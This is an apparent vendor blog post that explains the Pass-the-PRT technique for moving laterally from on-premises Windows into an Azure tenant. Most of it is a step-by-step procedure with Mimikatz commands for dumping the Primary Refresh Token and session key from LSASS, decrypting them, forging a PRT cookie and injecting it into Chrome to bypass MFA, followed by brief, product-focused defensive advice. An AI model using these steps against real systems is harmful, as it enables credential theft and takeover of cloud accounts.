Laterally moving into cloud tenant from On-Prem exploiting Pass-the-PRT attack technique

Moving laterally from on-premises resources to cloud tenant is a complex process. Attackers use various tactics to spread laterally across on-premises Windows machines. Pass-the-Ticket, Pass-the-Hash, Overpass-the-Hash, and Golden Tickets attacks are a few of them. However, these similar techniques are also effective in moving laterally from a compromised workstation to connected cloud resources, bypassing strong authentication measures like MFA. Curious to know how? Check out this article, which explains how attackers can perform lateral movement to the cloud with an attack called Pass-the-PRT.

What is a Primary Refresh Token (PRT)

Are you tired of having to constantly re-authenticate to access your Azure and Microsoft 365 resources? Enter the Primary Refresh Token (PRT). Similar to a Kerberos ticket-granting ticket, a PRT provides single sign-on capabilities for Windows 10 devices that are Azure or hybrid Azure joined.

So how does it work? When you log in, your Windows 10 device communicates with the Windows 10 Cloud Authentication Provider, which validates your credentials and returns a PRT and session key. Your device then stores both in LSASS, re-encrypting the session key with its Trusted Platform Module (TPM).

The real magic happens when you try to log into a website using a browser that supports SSO to Azure. The Cloud Authentication Provider will create a PRT cookie for the browser, allowing you to seamlessly access your resources without having to re-authenticate. Say goodbye to the hassle of constant re-authentication and hello to the convenience of PRTs.

To see whether you have a PRT, run this command:

Dsregcmd.exe /status

In the SSO State section, check?AzureAdPrt; if it is set to YES, you have a PRT.

If it is set to NO, use the command below to check whether your device is joined to Azure AD, since that is required for PRTs to be issued.

Performing a Pass-the-PRT attack can give adversaries access to web resources as a user, bypassing any conditional access requirements in place. If an adversary manages to get a user's PRT and session key, they can create PRT cookies, granting them access for up to 2 weeks, unless the account is disabled. It's crucial to be aware of this vulnerability and take necessary precautions to prevent such attacks. In this post, we walk through how such an attack can be performed. Stay vigilant and keep your accounts secure.?

Here are the steps to extract the PRT from LSASS, decrypt it using a DPAPI masterkey, and use it to create a new PRT cookie. By importing this cookie into a Chrome browser session, you can authenticate to websites as the user without ever knowing their password or having to handle any MFA prompts.

Step 1. Extract the PRT from LSASS

To see PRT data for the machine we have compromised, we use the following command in?Mimikatz?release 2.2.0 20200807 or later:

Privilege::debug

Sekurlsa::cloudap

Here is the output. We will copy the part labeled?PRT?and save it for later.

If you don’t see any PRT data, check whether the device is Azure AD joined by running the command?dsregcmd /status?as shown earlier. If?AzureAdPrt?is set to?YES, check what version of Windows 10 the machine is running

Step 2. Extract the Proof of possession key

Now we will extract the session key or “ProofOfPosessionKey”, which is highlighted below.? ?This is encrypted and we will need to use our DPAPI masterkeys to decrypt it.

Step 3. Decrypt the session key

Now we will elevate our privileges to SYSTEM and to run under the computer context to be able to use the DPAPI masterkey to decrypt the session key:

Token::elevate

Dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect

Now we will copy two values. The first is the Context value:

And the second is the Derived Key value:

Step 4. Generate PRT cookies.

We can perform the rest of this attack from any workstation. To generate PRT cookies, we simply run the following command:

Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]

The output will include a signed PRT cookie after?Signature with key. Copy that text.

Step 5. Inject the PRT cookie into a browser session

Launch Google Chrome in incognito mode and navigate to?https://login.microsoftonline.com.?When you are prompted for your login data, right-click anywhere on the page, and then choose?Inspect?to open the dev tools for Chrome.

Go to the Application tab, double-click?Cookies, and click?login.microsoftonline.com. In the pane on the right, in the top action bar, click the circle with a diagonal slash to clear all existing cookies. Then double-click an empty row in the table and add the following new cookie:

Name: x-ms-RefreshTokenCredential

Value: [Paste your output from above]

HttpOnly: Set to True (checked)

Leave other fields to their default values

How to protect your cloud environment against Pass-the-PRT attack

Protecting against Pass-the-PRT attacks is crucial for any organization. These attacks are difficult to detect as they use legitimate SSO processes. However, there are steps you can take to prevent them.

One effective strategy is to use endpoint protection software that can detect the use of Mimikatz, which is used in the first stage of the attack. But prevention is even better than detection. To perform Pass-the-PRT, the intruder needs to have already gained access to a machine. With the Netwrix Active Directory Security Solution, you can prevent malefactors from gaining that foothold in your environment in the first place.

Moreover, this attack requires local administrative rights. Using endpoint management software like Netwrix PolicyPak, you can remove these powerful rights from users without hurting their productivity. Additionally, this software can prevent computers from launching malicious software and secure their browser settings.